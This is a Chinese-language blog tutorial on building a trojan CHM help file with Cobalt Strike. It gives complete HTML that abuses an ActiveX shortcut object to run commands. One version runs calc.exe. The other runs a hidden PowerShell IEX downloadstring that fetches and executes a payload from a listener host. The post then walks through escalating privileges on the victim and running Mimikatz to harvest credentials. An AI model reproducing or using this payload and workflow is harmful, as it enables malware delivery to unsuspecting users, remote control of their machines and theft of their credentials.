Colbalt Strike之CHM木马

一、命令执行(calc)木马生成

1.生成木马

首先创建一个根目录,文件名为exp
在文件夹里创建两个目录和一个index.html文件
在两个目录里分别创建txt文件或html文件
在这里插入图片描述
index.html写入以下内容

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec 
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=',calc.exe'>
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

在这里插入图片描述
启动EasyCHM软件,点击新建
在这里插入图片描述
点击浏览
在这里插入图片描述
选择exp文件夹,点确定
在这里插入图片描述

点击工具栏的编译按钮
在这里插入图片描述
弹出对话框,点击生成CHM,会在桌面生成一个CHM文件

在这里插入图片描述
在这里插入图片描述

2.测试

把文件放到目标机器,运行,成功弹出计算器
在这里插入图片描述

二、power shell 反向HTTP连接 木马生成

1.启动Colbalt Strike

新建一个payload,点击Cobalt Strike --> Listeners
在这里插入图片描述
点击Add
在这里插入图片描述
填好Name Host Port,点击save

在这里插入图片描述

2.生成木马

点击菜单 attacks --> web Drive by --> scripted web Delovery
在这里插入图片描述
type类型设置powershell 单机launch
在这里插入图片描述
生成结果
在这里插入图片描述
用代码将index.html中的calc.exea替换

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec 
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://10.60.250.229:80/a'))">
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

在这里插入图片描述

  • 需要将原有的单引号换成双引号
  • powershell 后面加入逗号
  • IEX前面和对应的双引号删除
  • 网址换成单引号

3.测试

编译生成,运行如下
在这里插入图片描述

三、提权。

在要提权的shell右键点击Access --> Elevate

在这里插入图片描述

然后再点击 Access --> Run Minmikatz

在这里插入图片描述

成功反弹。

在这里插入图片描述

posted @ 2018-11-15 12:05  浅笑996  阅读(416)  评论(0)    收藏  举报